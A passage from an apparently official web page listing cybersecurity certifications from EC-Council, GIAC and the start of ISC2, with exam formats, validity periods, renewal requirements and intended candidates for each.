annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Network and IT Administrators</li> <li>Data Security Analysts</li> <li>Security Operators</li> <li>Network Engineers and Technicians</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Penetration Testing Professional (CPENT)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to perform an effective penetration testing in an enterprise network environment that must be attacked, exploited, evaded, and defended</li> <li>No prerequisites</li> <li>24-hour exam consists of a 100% practical assessment within the cyber range and the submission of a Penetration Testing report</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Ethical Hackers</li> <li>Network Server and Firewall Administrators</li> <li>Risk Assessment Professionals</li> <li>Security Engineers and Analysts</li> <li>Information Security Consultants</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Secure Computer User (CSCU)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate can identify information security threats and mitigate them effectively</li> <li>No prerequisites</li> <li>Exam consists of 50 multiple choice questions</li> <li>Valid for 3 years</li> <li>CSCU is not part of the EC-Council Continuing Education (ECE) scheme. To recertify, a candidate must take the exam again</li> </ul><h5>Intended candidates</h5> <ul><li>Anyone 13 and over who uses a computer for work, study, or play</li> <li>End-users</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified SOC Analyst (CSA)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās comprehensive understanding of the tasks required as a SOC Analyst</li> <li>Program focuses on creating new career opportunities for candidates by providing them with in-demand technical skills, knowledge, and enhanced-level capabilities to dynamically contribute to a SOC team</li> <li>Candidates seeking certification without official training are required to have 1 year of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 100 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Tier I and Tier II Security Operations Centre Analysts</li> <li>Cyber Security Analysts</li> <li>Network and Security Administrators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Threat Intelligence Analyst (CTIA)</h4> </div> <h5>Certification overview</h5> <ul><li>Demonstrates that a candidate has the skills to identify and mitigate business risks by converting unknown internal and external threats into quantifiable threat entities and stop them in their tracks</li> <li>Candidates seeking certification without official training are required to have 2 years of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 50 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Ethical Hackers</li> <li>Digital Forensic and Malware Analysts</li> <li>Threat Intelligent Analysts</li> <li>Incident Response Team Members</li> <li>SOC Professionals</li> <li>Security Practitioners, Engineers, Analysts, Architects, and Managers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Computer Hacking Forensics Investigator (CHFI)Ā – ANSI</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate has the necessary skills to proactively investigate complex security threats, allowing them to investigate, record, and report cybercrimes to prevent future attacks</li> <li>Lab-focused, vendor-neutral program</li> <li>Candidates seeking certification without official training must have 2 years of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 150 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>IT Managers</li> <li>Digital Forensic Service Providers</li> <li>Law enforcement personnel</li> <li>Defence and Security personnel</li> <li>Government Agencies</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Digital Forensics Essentials (DFE)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level credential helps candidates increase their competency and expertise in digital forensics and information security skills, thereby adding value to their workplace and employer</li> <li>No prerequisites</li> <li>Exam consists of 75 multiple choice questions</li> <li>Valid for 3 years</li> <li>DFE is not part of the EC-Council Continuing Education (ECE) scheme. To recertify, a candidate must take the exam again</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals seeking entry-level cyber security or information security roles</li> <li>Help Desk Technicians</li> <li>Network Administrators</li> <li>Network Technicians</li> <li>Computer Support Specialists</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">EC Council Disaster Recovery Professional (EDRP)</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās ability to plan, strategize, implement, and maintain a business continuity and disaster recovery plan</li> <li>Candidates seeking certification without official training must have at least 2 years of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 150 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>IT Directors and CISOs</li> <li>IT Risk Managers and Consultants</li> <li>Business Continuity and Disaster Recovery Consultants</li> <li>IT Professionals in Disaster Recovery, Business Continuity, and System Administration domains</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">EC-Council Certified Encryption Specialist (ECES)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification that introduces professionals and students to the field of cryptography by learning the foundations of modern symmetric and key cryptography</li> <li>Candidates seeking certification without official training must have at least 1 year of related work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 50 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Cryptanalysts</li> <li>Cryptographers</li> <li>Ethical Hackers</li> <li>Penetration Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">EC-Council Certified Incident Handler (ECIH)Ā – ANSI</h4> </div> <h5>Certification overview</h5> <ul><li>Validates that a candidate has the knowledge and skills to effectively handle post breach consequences by reducing impact of the incident from both a financial and reputational perspective</li> <li>Specialist-level program</li> <li>Candidates seeking certification without official training must have at least 1 year of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 100 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>Risk Assessment Handlers</li> <li>System Administrators and Engineers</li> <li>Network and IT Managers</li> <li>Application Security Engineers</li> <li>Cyber Forensic Investigators and Analysts</li> <li>SOC Analysts</li> <li>Penetration Testers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Ethical Hacking Essentials (EHE)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level credential covers ethical hacking and penetration testing fundamentals and prepares learners for a career in cyber security</li> <li>No prerequisites</li> <li>Exam consists of 75 multiple choice questions</li> <li>Valid for 3 years</li> <li>ECE is not part of the EC-Council Continuing Education (ECE) scheme. To recertify, a candidate must take the exam again</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals seeking entry-level cyber security or information security roles</li> <li>Help Desk Technicians</li> <li>Network Administrators</li> <li>Network Technicians</li> <li>Computer Support Specialists</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Industrial Control Systems and Supervisory Control and Data Acquisitions (ICS/SCADA) Cybersecurity</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the foundations of security and ability to defend network architectures from attacks</li> <li>Candidates seeking certification without official training are required to have 1 year of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 75 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators and Engineers</li> <li>SCADA Systems personnel</li> <li>Business System Analysts who support SCADA interfaces</li> <li>Security Consultants who perform security assessments of SCADA and/or ICS</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Industrial Control Systems and Supervisory Control and Data Acquisitions (ICS/SCADA) Cybersecurity</h4> </div> <h5>Certification overview</h5> <ul><li>Validates a candidateās knowledge of the foundations of security and ability to defend network architectures from attacks</li> <li>Candidates seeking certification without official training are required to have 1 year of work experience in information security and must apply for exam eligibility</li> <li>Exam consists of 75 multiple choice questions</li> <li>Valid for 3 years</li> <li>To recertify, you must earn 120 continuing education credits during the 3-year period and pay annual fees</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators and Engineers</li> <li>SCADA Systems personnel</li> <li>Business System Analysts who support SCADA interfaces</li> <li>Security Consultants who perform security assessments of SCADA and/or ICS</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Network Defense Essentials (NDE)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level credential covers the fundamental concepts of information security and network defense, and is ideal for learners aspiring to pursue a career in cyber security</li> <li>No prerequisites</li> <li>Exam consists of 75 multiple choice questions</li> <li>Valid for 3 years</li> <li>NDE is not part of the EC-Council Continuing Education (ECE) scheme. To recertify, a candidate must take the exam again</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals seeking entry-level cyber security or information security roles</li> <li>Help Desk Technicians</li> <li>Network Administrators</li> <li>Network Technicians</li> <li>Computer Support Specialists</li> </ul></details><details class="grouped" id="wb-auto-10"><summary><h3 id="tab7">4.7 Global Information Assurance Certification (GIAC)</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Advanced Smartphone Forensics (GASF)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidate is qualified to perform forensic examinations on devices such as mobile phones and tablets; and has an understanding of the fundamentals of mobile forensics, device file system analysis, mobile application behaviour, event artifact analysis and the identification and analysis of mobile device malware</li> <li>Valid for 4 years</li> <li>Exam consists of 75 questions</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Digital Forensic and Malware Analyst</li> <li>Cyber Defense Forensic Analysts and Investigators</li> <li>Penetration Testers</li> <li>Exploit Developers</li> <li>Threat Hunters</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Assessing and Auditing Wireless Networks (GAWN)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Demonstrates knowledge of the different security mechanisms for wireless networks, the tools and techniques used to evaluate and exploit weaknesses, and techniques used to analyze wireless networks.</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Auditors</li> <li>Ethical Hackers</li> <li>Penetration Testers</li> <li>Network Security Professionals</li> <li>Wireless System Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Detection Analyst (GCDA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to collect, analyze, and tactically use modern network and endpoint data sources to detect malicious or unauthorized activity</li> <li>GCDA certificate holders are qualified for hands-on leadership positions that deal with Security Information and Event Management (SIEM)</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Analysts</li> <li>Security Architects</li> <li>Senior Security Engineers</li> <li>Security Operations Centre Engineers and Analysts</li> <li>Cyber Threat Investigators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Enterprise Defender (GCED)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās knowledges and abilities in the areas of defensive network infrastructure, packet analysis, penetration testing, incident handling, and malware remove</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Incident Responders</li> <li>Penetration Testers</li> <li>Security Operations Centre Engineers and Analysts</li> <li>Network Security Professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Forensic Analyst (GCFA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates that a candidate has the knowledge, skills, and ability to conduct formal incident investigations and handle advanced incident handling scenarios, such as internal and external data breach intrusions or advanced persistent threats.</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Incident Response Team Members</li> <li>Security Operations Centre Analysts</li> <li>Federal Agents and Law Enforcement Professionals</li> <li>Digital Forensics Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Forensic Examiner (GCFE)</h4> </div> <h5>Certification overview</h5> <ul><li>Intermediate-level certification</li> <li>Validates a candidateās knowledge of computer forensics analysis, including core skills needed to collect and analyze data from Windows systems</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Information Security professionals</li> <li>Law enforcement members</li> <li>Digital Forensics and Malware Analysts</li> <li>Cyber Defense Forensic Analysts and Investigators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Incident Handler (GCIH)</h4> </div> <h5>Certification overview</h5> <ul><li>Intermediate-level certification</li> <li>Demonstrates oneās ability to detect, respond, and resolve computer security incidents using a wide range of essential security skills</li> <li>Exam consists of 100-150 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Incident Response Team Members</li> <li>Cyber Defence Incident Responder</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Intrusion Analyst (GCIA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās knowledge of network and host monitoring traffic analysis, and intrusion detection</li> <li>Certificate holders are qualified to configure and monitor intrusion detection systems, and to analyze network traffic</li> <li>Exam consists of 100-150 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals who are responsible for network and host monitoring, traffic analysis, or intrusion detection</li> <li>Threat Hunters</li> <li>Security Operations Centre Analysts</li> <li>Incident Response team members</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Web Application Defender (GWEB)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Demonstrates that a candidate has mastered the security knowledge and skills needed to deal with common web application errors that lead to most security problems.</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Application Developers</li> <li>Application Security Analysts</li> <li>Application Architects</li> <li>Penetration Testers</li> <li>Individuals in roles requiring PCI compliance</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Certified Windows Security Administrator (GCWN)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to secure Windows clients and servers, and knowledge of configuring and managing the security of Microsoft operating systems and applications</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Individuals responsible for installing, configuring, and securing Microsoft Windows clients and servers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Continuous Monitoring Certification (GMON)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to deter intrusions and quickly detect anomalous activity</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Architects</li> <li>Security Operations Centre Analysts and Managers</li> <li>Technical Security manager</li> <li>Security Engineers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Critical Controls Certification (GCCC)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>The only certification that is based on the Critical Security Controls, a prioritized, risk-based approach to security.</li> <li>Validates a candidateās knowledge and skills to implement and execute the Critical Security Controls recommended by the Council on Cybersecurity and perform audits based on the standard.</li> <li>No prerequisites</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>IT Administrators</li> <li>DoD personnel</li> <li>Network Security Engineers</li> <li>Security Vendors</li> <li>Security Auditors, CIOs, and Risk Officers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Critical Infrastructure Protection (GCIP)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidate has the knowledge and skills needed to understand the North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP) regulations and plan practical implementation strategies to achieve regulatory compliance.</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Operations Analysts</li> <li>Team Leaders and Managers</li> <li>Incident Response Analysts</li> <li>ICS Cyber Security Practitioners</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Cyber Threat Intelligence (GCTI)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to understand and analyze complex threat analysis scenarios; identify, create, and validate intelligence requirements through threat modelling.</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Incident Response Team members</li> <li>Threat Hunters</li> <li>Intelligence Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Defending Advanced Threats (GDAT)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates that a candidate has advanced knowledge of how adversaries penetrate networks and what security controls are effective to stop them.</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Architects</li> <li>Security Engineers</li> <li>Technical Security Managers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Defensible Security Architecture (GDSA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates that a candidateās real-world, hands-on skills dealing with network-centric and data-centric approaches to defensible security architecture, hardening applications across the Transmission Control Protocol/Internet Protocol (TSP/IP) stack, and secure environment creation with private, hybrid, or public clouds</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Architects</li> <li>Network Engineers</li> <li>Security Analysts</li> <li>Cyber Threat Investigators</li> <li>Senior Security Engineers</li> <li>Security Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to find and mitigate significant security flaws in systems and networks</li> <li>Exam consists of 55-75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Vulnerability Testers</li> <li>Security Analysts</li> <li>Vulnerability Assessment Analysts</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Information Security Fundamentals (GISF)</h4> </div> <h5>Certification overview</h5> <ul><li>Introductory-level certification</li> <li>Validates a candidateās knowledge of securityās foundation, computer functions and networking, introductory level cryptography, and cyber security technologies</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Management</li> <li>Information Security Officers</li> <li>System Administrators</li> <li>Professionals who need an introduction to cyber security fundamentals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Information Security Professional (GISP)</h4> </div> <h5>Certification overview</h5> <ul><li>Intermediate-level certification for Managers and Leaders</li> <li>Validates a candidateās knowledge of the 8 domains of cybersecurity knowledge, asset security, communications and network security, identity and access management, security and risk management, security assessment and testing, security engineering, security operations, and software development security.</li> <li>Candidate should have some experience in information systems and networking</li> <li>Exam consists of 250 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>System Administrators</li> <li>Security Administrators</li> <li>Network Administrators</li> <li>Security Managers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Mobile Device Security Analyst (GMOB)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās to properly secure mobile devices that are accessing vital information</li> <li>Demonstrates knowledge of assessing and managing mobile device and application security, and mitigating against malware and stolen devices</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Information Security Analysts</li> <li>Penetration Testers</li> <li>Ethical Hackers</li> <li>Network and System Administrators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Network Forensic Analyst (GNFA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to perform examinations employing network forensic artifact analysis</li> <li>Exam consists of 50 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Law Enforcement members</li> <li>Digital Forensic and Malware Analysts</li> <li>Cyber Defence Analysts</li> <li>Incident Response team members</li> <li>Security Operations Centre team members</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Penetration Tester (GPEN)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to properly conduct a penetration test, using best practice techniques and methodologies</li> <li>Exam consists of up to 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Tester</li> <li>Exploit Developers</li> <li>Network Security personnel</li> <li>Ethical Hackers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Response and Industrial Defence (GRID)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Demonstrates that a candidate understands the Active Defence Approach, ICS-specific attacks, and how these attacks inform mitigation strategies</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Industrial Control System Incident Response Team leads and members</li> <li>Security Operations Centre Team leads and Analysts</li> <li>Active Defenders</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Reverse Engineering Malware (GREM)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās knowledge and skills to reverse-engineer malware that targets common platforms such as Microsoft Windows and web browsers</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>System and Network Administrators</li> <li>Auditors</li> <li>Security Managers</li> <li>Forensic Investigators</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Security Essentials Certification (GSEC)</h4> </div> <h5>Certification overview</h5> <ul><li>Entry-level certification</li> <li>Validates an individualās knowledge of information security beyond simple terminology and concepts</li> <li>Recipients are skilled in active defense, cryptography, security policy and plans, incident handling and securing networks.</li> <li>Exam consists of 180 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Professionals</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Security Expert (GSE)</h4> </div> <h5>Certification overview</h5> <ul><li>Less than 250 GSE certificate holders in the world</li> <li>Validates that a candidate has mastered the wide variety of skills required by top security consultants and practitioners</li> <li>Pre-requisites are GSEC, GCIH, GCIA with 2 Gold certifications</li> <li>Exam consists of 2 parts: 24 VM-based hands-on questions and a practical lab</li> <li>Valid for 4 years</li> <li>Recertification requires taking the current version of the exam</li> <li>Renewing GSE certification renews all other active GIAC certifications</li> </ul><h5>Intended candidates</h5> <ul><li>Top Security Consultants and Practitioners</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Security Leadership (GSLC)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification for Managers and Leaders</li> <li>Validates a candidateās knowledge of governance and technical controls focused on protecting, detecting, and responding to security issues.</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Managers/Supervisors of Information Security teams</li> <li>IT Managers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Systems and Network Auditor (GSNA)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification for Managers and Leaders</li> <li>Validates a candidateās ability to apply basic risk analysis techniques and to conduct technical audits of essential information systems</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Technical staff responsible for securing and auditing information systems</li> <li>Auditors</li> <li>Network Administrators</li> <li>Managers of Audit or Security teams</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">GIAC Web Application Penetration Tester (GWAPT)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Validates a candidateās ability to better secure organizations through penetration testing and thorough understanding of web application security issues.</li> <li>Demonstrates knowledge of web applications exploits and penetration testing methodologies</li> <li>Exam consists of 75 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Penetration Testers</li> <li>Vulnerability Testers</li> <li>Security Analysts</li> <li>Vulnerability Assessment Analysts</li> <li>Ethical Hackers</li> <li>Website Designers</li> </ul><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Global Industrial Cyber Security Professional (GICSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Advanced-level certification</li> <li>Assesses a candidateās base level of knowledge and understanding across a diverse set of professionals who engineer or support control systems and share responsibility for the security of these environments</li> <li>No perquisites</li> <li>Exam consists of 115 questions</li> <li>Valid for 4 years</li> <li>Renewal requires taking the current version of the exam; or obtaining 36 continuing education credits over the 4-year period</li> </ul><h5>Intended candidates</h5> <ul><li>Security Engineers</li> <li>Industry Managers</li> <li>Security Analysts</li> </ul></details><details class="grouped" id="wb-auto-11"><summary><h3 id="tab8">4.8 International Information Systems Security Certification Consortium</h3> </summary><div class="mrgn-tp-md well well-sm"> <h4 class="mrgn-tp-0 mrgn-bttm-0">Certified Cloud Security Professional (CCSP)</h4> </div> <h5>Certification overview</h5> <ul><li>Co-developed with Cloud Security Alliance (CSA)</li> <li>Recognizes IT and information security leaders who have the knowledge and skills with cloud security architecture, design, operations, and service orchestration</li> <li>Candidates require a minimum of 5 years work related experience in IT; at least 3 of those years must be in information security and 1 year in one of the 6 domains of CCSP Common Body of Knowledge</li> <li>Exam consists of 125 multiple choice questions</li> <li>Valid for 3 years</li> <li>Recertification requires obtaining 90 continuing education credits 